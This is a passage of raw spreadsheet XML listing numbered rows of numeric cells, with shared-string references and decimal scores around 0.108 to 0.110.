      <c r="D21172" s="2">
        <v>1.0</v>
      </c>
      <c r="E21172" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21172" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21173" ht="15.75" customHeight="1">
      <c r="A21173" s="1">
        <v>18671.0</v>
      </c>
      <c r="B21173" s="2">
        <v>5.3543074E7</v>
      </c>
      <c r="C21173" s="2" t="s">
        <v>20435</v>
      </c>
      <c r="D21173" s="2">
        <v>1.0</v>
      </c>
      <c r="E21173" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21173" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21174" ht="15.75" customHeight="1">
      <c r="A21174" s="1">
        <v>19254.0</v>
      </c>
      <c r="B21174" s="2">
        <v>5.5123576E7</v>
      </c>
      <c r="C21174" s="2" t="s">
        <v>20436</v>
      </c>
      <c r="D21174" s="2">
        <v>1.0</v>
      </c>
      <c r="E21174" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21174" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21175" ht="15.75" customHeight="1">
      <c r="A21175" s="1">
        <v>34209.0</v>
      </c>
      <c r="B21175" s="2">
        <v>2.1837148E7</v>
      </c>
      <c r="C21175" s="2" t="s">
        <v>20437</v>
      </c>
      <c r="D21175" s="2">
        <v>1.0</v>
      </c>
      <c r="E21175" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21175" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="21176" ht="15.75" customHeight="1">
      <c r="A21176" s="1">
        <v>1814.0</v>
      </c>
      <c r="B21176" s="2">
        <v>2.9229537E7</v>
      </c>
      <c r="C21176" s="2" t="s">
        <v>20438</v>
      </c>
      <c r="D21176" s="2">
        <v>1.0</v>
      </c>
      <c r="E21176" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21176" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="21177" ht="15.75" customHeight="1">
      <c r="A21177" s="1">
        <v>2267.0</v>
      </c>
      <c r="B21177" s="2">
        <v>3.2460425E7</v>
      </c>
      <c r="C21177" s="2" t="s">
        <v>20439</v>
      </c>
      <c r="D21177" s="2">
        <v>1.0</v>
      </c>
      <c r="E21177" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21177" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="21178" ht="15.75" customHeight="1">
      <c r="A21178" s="1">
        <v>3268.0</v>
      </c>
      <c r="B21178" s="2">
        <v>3.7468415E7</v>
      </c>
      <c r="C21178" s="2" t="s">
        <v>20440</v>
      </c>
      <c r="D21178" s="2">
        <v>1.0</v>
      </c>
      <c r="E21178" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21178" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="21179" ht="15.75" customHeight="1">
      <c r="A21179" s="1">
        <v>3742.0</v>
      </c>
      <c r="B21179" s="2">
        <v>3.968841E7</v>
      </c>
      <c r="C21179" s="2" t="s">
        <v>20441</v>
      </c>
      <c r="D21179" s="2">
        <v>1.0</v>
      </c>
      <c r="E21179" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21179" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="21180" ht="15.75" customHeight="1">
      <c r="A21180" s="1">
        <v>4387.0</v>
      </c>
      <c r="B21180" s="2">
        <v>4.2201711E7</v>
      </c>
      <c r="C21180" s="2" t="s">
        <v>20442</v>
      </c>
      <c r="D21180" s="2">
        <v>1.0</v>
      </c>
      <c r="E21180" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21180" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="21181" ht="15.75" customHeight="1">
      <c r="A21181" s="1">
        <v>4932.0</v>
      </c>
      <c r="B21181" s="2">
        <v>4.3996656E7</v>
      </c>
      <c r="C21181" s="2" t="s">
        <v>20443</v>
      </c>
      <c r="D21181" s="2">
        <v>1.0</v>
      </c>
      <c r="E21181" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21181" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="21182" ht="15.75" customHeight="1">
      <c r="A21182" s="1">
        <v>5488.0</v>
      </c>
      <c r="B21182" s="2">
        <v>4.5774274E7</v>
      </c>
      <c r="C21182" s="2" t="s">
        <v>20444</v>
      </c>
      <c r="D21182" s="2">
        <v>1.0</v>
      </c>
      <c r="E21182" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21182" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="21183" ht="15.75" customHeight="1">
      <c r="A21183" s="1">
        <v>5977.0</v>
      </c>
      <c r="B21183" s="2">
        <v>4.7376575E7</v>
      </c>
      <c r="C21183" s="2" t="s">
        <v>20445</v>
      </c>
      <c r="D21183" s="2">
        <v>1.0</v>
      </c>
      <c r="E21183" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21183" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="21184" ht="15.75" customHeight="1">
      <c r="A21184" s="1">
        <v>6966.0</v>
      </c>
      <c r="B21184" s="2">
        <v>4.998173E7</v>
      </c>
      <c r="C21184" s="2" t="s">
        <v>20446</v>
      </c>
      <c r="D21184" s="2">
        <v>1.0</v>
      </c>
      <c r="E21184" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21184" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="21185" ht="15.75" customHeight="1">
      <c r="A21185" s="1">
        <v>10905.0</v>
      </c>
      <c r="B21185" s="2">
        <v>1.6640553E7</v>
      </c>
      <c r="C21185" s="2" t="s">
        <v>20447</v>
      </c>
      <c r="D21185" s="2">
        <v>1.0</v>
      </c>
      <c r="E21185" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21185" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="21186" ht="15.75" customHeight="1">
      <c r="A21186" s="1">
        <v>16103.0</v>
      </c>
      <c r="B21186" s="2">
        <v>4.5398161E7</v>
      </c>
      <c r="C21186" s="2" t="s">
        <v>20448</v>
      </c>
      <c r="D21186" s="2">
        <v>1.0</v>
      </c>
      <c r="E21186" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21186" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="21187" ht="15.75" customHeight="1">
      <c r="A21187" s="1">
        <v>18827.0</v>
      </c>
      <c r="B21187" s="2">
        <v>5.3937059E7</v>
      </c>
      <c r="C21187" s="2" t="s">
        <v>20449</v>
      </c>
      <c r="D21187" s="2">
        <v>1.0</v>
      </c>
      <c r="E21187" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21187" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="21188" ht="15.75" customHeight="1">
      <c r="A21188" s="1">
        <v>24049.0</v>
      </c>
      <c r="B21188" s="2">
        <v>9549902.0</v>
      </c>
      <c r="C21188" s="2" t="s">
        <v>20450</v>
      </c>
      <c r="D21188" s="2">
        <v>1.0</v>
      </c>
      <c r="E21188" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21188" s="2">
        <v>0.1085858585858586</v>
      </c>
    </row>
    <row r="21189" ht="15.75" customHeight="1">
      <c r="A21189" s="1">
        <v>31380.0</v>
      </c>
      <c r="B21189" s="2">
        <v>4996590.0</v>
      </c>
      <c r="C21189" s="2" t="s">
        <v>20451</v>
      </c>
      <c r="D21189" s="2">
        <v>1.0</v>
      </c>
      <c r="E21189" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21189" s="2">
        <v>0.1085858585858586</v>
      </c>
    </row>
    <row r="21190" ht="15.75" customHeight="1">
      <c r="A21190" s="1">
        <v>34031.0</v>
      </c>
      <c r="B21190" s="2">
        <v>9549901.0</v>
      </c>
      <c r="C21190" s="2" t="s">
        <v>20450</v>
      </c>
      <c r="D21190" s="2">
        <v>1.0</v>
      </c>
      <c r="E21190" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21190" s="2">
        <v>0.1085858585858586</v>
      </c>
    </row>
    <row r="21191" ht="15.75" customHeight="1">
      <c r="A21191" s="1">
        <v>12400.0</v>
      </c>
      <c r="B21191" s="2">
        <v>2.8933837E7</v>
      </c>
      <c r="C21191" s="2" t="s">
        <v>20452</v>
      </c>
      <c r="D21191" s="2">
        <v>1.0</v>
      </c>
      <c r="E21191" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21191" s="2">
        <v>0.1085470085470085</v>
      </c>
    </row>
    <row r="21192" ht="15.75" customHeight="1">
      <c r="A21192" s="1">
        <v>1542.0</v>
      </c>
      <c r="B21192" s="2">
        <v>2.75731E7</v>
      </c>
      <c r="C21192" s="2" t="s">
        <v>20453</v>
      </c>
      <c r="D21192" s="2">
        <v>1.0</v>
      </c>
      <c r="E21192" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21192" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="21193" ht="15.75" customHeight="1">
      <c r="A21193" s="1">
        <v>2284.0</v>
      </c>
      <c r="B21193" s="2">
        <v>3.2549944E7</v>
      </c>
      <c r="C21193" s="2" t="s">
        <v>20454</v>
      </c>
      <c r="D21193" s="2">
        <v>1.0</v>
      </c>
      <c r="E21193" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21193" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="21194" ht="15.75" customHeight="1">
      <c r="A21194" s="1">
        <v>32854.0</v>
      </c>
      <c r="B21194" s="2">
        <v>6266146.0</v>
      </c>
      <c r="C21194" s="2" t="s">
        <v>20455</v>
      </c>
      <c r="D21194" s="2">
        <v>1.0</v>
      </c>
      <c r="E21194" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21194" s="2">
        <v>0.1083333333333334</v>
      </c>
    </row>
    <row r="21195" ht="15.75" customHeight="1">
      <c r="A21195" s="1">
        <v>12614.0</v>
      </c>
      <c r="B21195" s="2">
        <v>3.0181285E7</v>
      </c>
      <c r="C21195" s="2" t="s">
        <v>20456</v>
      </c>
      <c r="D21195" s="2">
        <v>1.0</v>
      </c>
      <c r="E21195" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21195" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="21196" ht="15.75" customHeight="1">
      <c r="A21196" s="1">
        <v>17262.0</v>
      </c>
      <c r="B21196" s="2">
        <v>4.9146836E7</v>
      </c>
      <c r="C21196" s="2" t="s">
        <v>20457</v>
      </c>
      <c r="D21196" s="2">
        <v>1.0</v>
      </c>
      <c r="E21196" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21196" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="21197" ht="15.75" customHeight="1">
      <c r="A21197" s="1">
        <v>26717.0</v>
      </c>
      <c r="B21197" s="2">
        <v>1.8232683E7</v>
      </c>
      <c r="C21197" s="2" t="s">
        <v>20458</v>
      </c>
      <c r="D21197" s="2">
        <v>1.0</v>
      </c>
      <c r="E21197" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21197" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="21198" ht="15.75" customHeight="1">
      <c r="A21198" s="1">
        <v>3577.0</v>
      </c>
      <c r="B21198" s="2">
        <v>3.8966742E7</v>
      </c>
      <c r="C21198" s="2" t="s">
        <v>20459</v>
      </c>
      <c r="D21198" s="2">
        <v>1.0</v>
      </c>
      <c r="E21198" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21198" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="21199" ht="15.75" customHeight="1">
      <c r="A21199" s="1">
        <v>14901.0</v>
      </c>
      <c r="B21199" s="2">
        <v>4.1158204E7</v>
      </c>
      <c r="C21199" s="2" t="s">
        <v>20460</v>
      </c>
      <c r="D21199" s="2">
        <v>1.0</v>
      </c>
      <c r="E21199" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21199" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="21200" ht="15.75" customHeight="1">
      <c r="A21200" s="1">
        <v>18855.0</v>
      </c>
      <c r="B21200" s="2">
        <v>5.398252E7</v>
      </c>
      <c r="C21200" s="2" t="s">
        <v>20461</v>
      </c>
      <c r="D21200" s="2">
        <v>1.0</v>
      </c>
      <c r="E21200" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21200" s="2">
        <v>0.1082862523540489</v>
      </c>
    </row>
    <row r="21201" ht="15.75" customHeight="1">
      <c r="A21201" s="1">
        <v>26853.0</v>
      </c>
      <c r="B21201" s="2">
        <v>1.9013433E7</v>
      </c>
      <c r="C21201" s="2" t="s">
        <v>20462</v>
      </c>
      <c r="D21201" s="2">
        <v>1.0</v>
      </c>
      <c r="E21201" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21201" s="2">
        <v>0.1082862523540489</v>
      </c>
    </row>
    <row r="21202" ht="15.75" customHeight="1">
      <c r="A21202" s="1">
        <v>1935.0</v>
      </c>
      <c r="B21202" s="2">
        <v>3.018677E7</v>
      </c>
      <c r="C21202" s="2" t="s">
        <v>20463</v>
      </c>
      <c r="D21202" s="2">
        <v>1.0</v>
      </c>
      <c r="E21202" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21202" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="21203" ht="15.75" customHeight="1">
      <c r="A21203" s="1">
        <v>16337.0</v>
      </c>
      <c r="B21203" s="2">
        <v>4.604714E7</v>
      </c>
      <c r="C21203" s="2" t="s">
        <v>20464</v>
      </c>
      <c r="D21203" s="2">
        <v>1.0</v>
      </c>
      <c r="E21203" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21203" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="21204" ht="15.75" customHeight="1">
      <c r="A21204" s="1">
        <v>17712.0</v>
      </c>
      <c r="B21204" s="2">
        <v>5.0595642E7</v>
      </c>
      <c r="C21204" s="2" t="s">
        <v>20465</v>
      </c>
      <c r="D21204" s="2">
        <v>1.0</v>
      </c>
      <c r="E21204" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21204" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="21205" ht="15.75" customHeight="1">
      <c r="A21205" s="1">
        <v>19223.0</v>
      </c>
      <c r="B21205" s="2">
        <v>5.5030615E7</v>
      </c>
      <c r="C21205" s="2" t="s">
        <v>20466</v>
      </c>
      <c r="D21205" s="2">
        <v>1.0</v>
      </c>
      <c r="E21205" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21205" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="21206" ht="15.75" customHeight="1">
      <c r="A21206" s="1">
        <v>243.0</v>
      </c>
      <c r="B21206" s="2">
        <v>1.4955914E7</v>
      </c>
      <c r="C21206" s="2" t="s">
        <v>20467</v>
      </c>
      <c r="D21206" s="2">
        <v>1.0</v>
      </c>
      <c r="E21206" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21206" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21207" ht="15.75" customHeight="1">
      <c r="A21207" s="1">
        <v>317.0</v>
      </c>
      <c r="B21207" s="2">
        <v>1.5686368E7</v>
      </c>
      <c r="C21207" s="2" t="s">
        <v>20468</v>
      </c>
      <c r="D21207" s="2">
        <v>1.0</v>
      </c>
      <c r="E21207" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21207" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21208" ht="15.75" customHeight="1">
      <c r="A21208" s="1">
        <v>411.0</v>
      </c>
      <c r="B21208" s="2">
        <v>1.6746045E7</v>
      </c>
      <c r="C21208" s="2" t="s">
        <v>20469</v>
      </c>
      <c r="D21208" s="2">
        <v>1.0</v>
      </c>
      <c r="E21208" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21208" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21209" ht="15.75" customHeight="1">
      <c r="A21209" s="1">
        <v>448.0</v>
      </c>
      <c r="B21209" s="2">
        <v>1.7147153E7</v>
      </c>
      <c r="C21209" s="2" t="s">
        <v>20470</v>
      </c>
      <c r="D21209" s="2">
        <v>1.0</v>
      </c>
      <c r="E21209" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21209" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21210" ht="15.75" customHeight="1">
      <c r="A21210" s="1">
        <v>990.0</v>
      </c>
      <c r="B21210" s="2">
        <v>2.2892143E7</v>
      </c>
      <c r="C21210" s="2" t="s">
        <v>20471</v>
      </c>
      <c r="D21210" s="2">
        <v>1.0</v>
      </c>
      <c r="E21210" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21210" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21211" ht="15.75" customHeight="1">
      <c r="A21211" s="1">
        <v>1034.0</v>
      </c>
      <c r="B21211" s="2">
        <v>2.3221123E7</v>
      </c>
      <c r="C21211" s="2" t="s">
        <v>20472</v>
      </c>
      <c r="D21211" s="2">
        <v>1.0</v>
      </c>
      <c r="E21211" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21211" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21212" ht="15.75" customHeight="1">
      <c r="A21212" s="1">
        <v>1596.0</v>
      </c>
      <c r="B21212" s="2">
        <v>2.7767852E7</v>
      </c>
      <c r="C21212" s="2" t="s">
        <v>20473</v>
      </c>
      <c r="D21212" s="2">
        <v>1.0</v>
      </c>
      <c r="E21212" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21212" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21213" ht="15.75" customHeight="1">
      <c r="A21213" s="1">
        <v>2508.0</v>
      </c>
      <c r="B21213" s="2">
        <v>3.3981423E7</v>
      </c>
      <c r="C21213" s="5" t="s">
        <v>20474</v>
      </c>
      <c r="D21213" s="2">
        <v>1.0</v>
      </c>
      <c r="E21213" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21213" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21214" ht="15.75" customHeight="1">
      <c r="A21214" s="1">
        <v>2598.0</v>
      </c>
      <c r="B21214" s="2">
        <v>3.4375275E7</v>
      </c>
      <c r="C21214" s="2" t="s">
        <v>20475</v>
      </c>
      <c r="D21214" s="2">
        <v>1.0</v>
      </c>
      <c r="E21214" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21214" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21215" ht="15.75" customHeight="1">
      <c r="A21215" s="1">
        <v>3313.0</v>
      </c>
      <c r="B21215" s="2">
        <v>3.7602749E7</v>
      </c>
      <c r="C21215" s="2" t="s">
        <v>20476</v>
      </c>
      <c r="D21215" s="2">
        <v>1.0</v>
      </c>
      <c r="E21215" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21215" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21216" ht="15.75" customHeight="1">
      <c r="A21216" s="1">
        <v>3578.0</v>
      </c>
      <c r="B21216" s="2">
        <v>3.8970659E7</v>
      </c>
      <c r="C21216" s="2" t="s">
        <v>20477</v>
      </c>
      <c r="D21216" s="2">
        <v>1.0</v>
      </c>
      <c r="E21216" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21216" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21217" ht="15.75" customHeight="1">
      <c r="A21217" s="1">
        <v>3851.0</v>
      </c>
      <c r="B21217" s="2">
        <v>4.0268647E7</v>
      </c>
      <c r="C21217" s="2" t="s">
        <v>20478</v>
      </c>
      <c r="D21217" s="2">
        <v>1.0</v>
      </c>
      <c r="E21217" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21217" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21218" ht="15.75" customHeight="1">
      <c r="A21218" s="1">
        <v>4411.0</v>
      </c>
      <c r="B21218" s="2">
        <v>4.2281907E7</v>
      </c>
      <c r="C21218" s="2" t="s">
        <v>20479</v>
      </c>
      <c r="D21218" s="2">
        <v>1.0</v>
      </c>
      <c r="E21218" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21218" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21219" ht="15.75" customHeight="1">
      <c r="A21219" s="1">
        <v>5054.0</v>
      </c>
      <c r="B21219" s="2">
        <v>4.4346821E7</v>
      </c>
      <c r="C21219" s="2" t="s">
        <v>20480</v>
      </c>
      <c r="D21219" s="2">
        <v>1.0</v>
      </c>
      <c r="E21219" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21219" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21220" ht="15.75" customHeight="1">
      <c r="A21220" s="1">
        <v>5267.0</v>
      </c>
      <c r="B21220" s="2">
        <v>4.5147927E7</v>
      </c>
      <c r="C21220" s="2" t="s">
        <v>20481</v>
      </c>
      <c r="D21220" s="2">
        <v>1.0</v>
      </c>
      <c r="E21220" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21220" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21221" ht="15.75" customHeight="1">
      <c r="A21221" s="1">
        <v>5350.0</v>
      </c>
      <c r="B21221" s="2">
        <v>4.5364877E7</v>
      </c>
      <c r="C21221" s="2" t="s">
        <v>20482</v>
      </c>
      <c r="D21221" s="2">
        <v>1.0</v>
      </c>
      <c r="E21221" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21221" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21222" ht="15.75" customHeight="1">
      <c r="A21222" s="1">
        <v>5707.0</v>
      </c>
      <c r="B21222" s="2">
        <v>4.6549043E7</v>
      </c>
      <c r="C21222" s="2" t="s">
        <v>20483</v>
      </c>
      <c r="D21222" s="2">
        <v>1.0</v>
      </c>
      <c r="E21222" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21222" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21223" ht="15.75" customHeight="1">
      <c r="A21223" s="1">
        <v>5986.0</v>
      </c>
      <c r="B21223" s="2">
        <v>4.7410236E7</v>
      </c>
      <c r="C21223" s="2" t="s">
        <v>20484</v>
      </c>
      <c r="D21223" s="2">
        <v>1.0</v>
      </c>
      <c r="E21223" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21223" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21224" ht="15.75" customHeight="1">
      <c r="A21224" s="1">
        <v>6235.0</v>
      </c>
      <c r="B21224" s="2">
        <v>4.807582E7</v>
      </c>
      <c r="C21224" s="2" t="s">
        <v>20485</v>
      </c>
      <c r="D21224" s="2">
        <v>1.0</v>
      </c>
      <c r="E21224" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21224" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21225" ht="15.75" customHeight="1">
      <c r="A21225" s="1">
        <v>6537.0</v>
      </c>
      <c r="B21225" s="2">
        <v>4.8853201E7</v>
      </c>
      <c r="C21225" s="2" t="s">
        <v>20486</v>
      </c>
      <c r="D21225" s="2">
        <v>1.0</v>
      </c>
      <c r="E21225" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21225" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21226" ht="15.75" customHeight="1">
      <c r="A21226" s="1">
        <v>6665.0</v>
      </c>
      <c r="B21226" s="2">
        <v>4.9111669E7</v>
      </c>
      <c r="C21226" s="2" t="s">
        <v>20487</v>
      </c>
      <c r="D21226" s="2">
        <v>1.0</v>
      </c>
      <c r="E21226" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21226" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21227" ht="15.75" customHeight="1">
      <c r="A21227" s="1">
        <v>6854.0</v>
      </c>
      <c r="B21227" s="2">
        <v>4.9646347E7</v>
      </c>
      <c r="C21227" s="2" t="s">
        <v>20488</v>
      </c>
      <c r="D21227" s="2">
        <v>1.0</v>
      </c>
      <c r="E21227" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21227" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21228" ht="15.75" customHeight="1">
      <c r="A21228" s="1">
        <v>7630.0</v>
      </c>
      <c r="B21228" s="2">
        <v>5.1751017E7</v>
      </c>
      <c r="C21228" s="2" t="s">
        <v>20489</v>
      </c>
      <c r="D21228" s="2">
        <v>1.0</v>
      </c>
      <c r="E21228" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21228" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21229" ht="15.75" customHeight="1">
      <c r="A21229" s="1">
        <v>7953.0</v>
      </c>
      <c r="B21229" s="2">
        <v>5.2654314E7</v>
      </c>
      <c r="C21229" s="2" t="s">
        <v>20490</v>
      </c>
      <c r="D21229" s="2">
        <v>1.0</v>
      </c>
      <c r="E21229" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21229" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21230" ht="15.75" customHeight="1">
      <c r="A21230" s="1">
        <v>7968.0</v>
      </c>
      <c r="B21230" s="2">
        <v>5.2694252E7</v>
      </c>
      <c r="C21230" s="2" t="s">
        <v>20491</v>
      </c>
      <c r="D21230" s="2">
        <v>1.0</v>
      </c>
      <c r="E21230" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21230" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21231" ht="15.75" customHeight="1">
      <c r="A21231" s="1">
        <v>8016.0</v>
      </c>
      <c r="B21231" s="2">
        <v>5.2792398E7</v>
      </c>
      <c r="C21231" s="2" t="s">
        <v>20492</v>
      </c>
      <c r="D21231" s="2">
        <v>1.0</v>
      </c>
      <c r="E21231" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21231" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21232" ht="15.75" customHeight="1">
      <c r="A21232" s="1">
        <v>8441.0</v>
      </c>
      <c r="B21232" s="2">
        <v>5.3958839E7</v>
      </c>
      <c r="C21232" s="2" t="s">
        <v>20493</v>
      </c>
      <c r="D21232" s="2">
        <v>1.0</v>
      </c>
      <c r="E21232" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21232" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21233" ht="15.75" customHeight="1">
      <c r="A21233" s="1">
        <v>8664.0</v>
      </c>
      <c r="B21233" s="2">
        <v>5.435453E7</v>
      </c>
      <c r="C21233" s="2" t="s">
        <v>20494</v>
      </c>
      <c r="D21233" s="2">
        <v>1.0</v>
      </c>
      <c r="E21233" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21233" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21234" ht="15.75" customHeight="1">
      <c r="A21234" s="1">
        <v>8668.0</v>
      </c>
      <c r="B21234" s="2">
        <v>5.4373584E7</v>
      </c>
      <c r="C21234" s="2" t="s">
        <v>20495</v>
      </c>
      <c r="D21234" s="2">
        <v>1.0</v>
      </c>
      <c r="E21234" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21234" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21235" ht="15.75" customHeight="1">
      <c r="A21235" s="1">
        <v>8949.0</v>
      </c>
      <c r="B21235" s="2">
        <v>5.4922945E7</v>
      </c>
      <c r="C21235" s="2" t="s">
        <v>20496</v>
      </c>
      <c r="D21235" s="2">
        <v>1.0</v>
      </c>
      <c r="E21235" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21235" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21236" ht="15.75" customHeight="1">
      <c r="A21236" s="1">
        <v>9587.0</v>
      </c>
      <c r="B21236" s="2">
        <v>5.6099482E7</v>
      </c>
      <c r="C21236" s="2" t="s">
        <v>20497</v>
      </c>
      <c r="D21236" s="2">
        <v>1.0</v>
      </c>
      <c r="E21236" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21236" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21237" ht="15.75" customHeight="1">
      <c r="A21237" s="1">
        <v>9650.0</v>
      </c>
      <c r="B21237" s="2">
        <v>5.6270238E7</v>
      </c>
      <c r="C21237" s="2" t="s">
        <v>20498</v>
      </c>
      <c r="D21237" s="2">
        <v>1.0</v>
      </c>
      <c r="E21237" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21237" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21238" ht="15.75" customHeight="1">
      <c r="A21238" s="1">
        <v>9980.0</v>
      </c>
      <c r="B21238" s="2">
        <v>5.6950732E7</v>
      </c>
      <c r="C21238" s="2" t="s">
        <v>20499</v>
      </c>
      <c r="D21238" s="2">
        <v>1.0</v>
      </c>
      <c r="E21238" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21238" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21239" ht="15.75" customHeight="1">
      <c r="A21239" s="1">
        <v>10053.0</v>
      </c>
      <c r="B21239" s="2">
        <v>5.7117336E7</v>
      </c>
      <c r="C21239" s="2" t="s">
        <v>20500</v>
      </c>
      <c r="D21239" s="2">
        <v>1.0</v>
      </c>
      <c r="E21239" s="3" t="s">
        <v>18833</v>
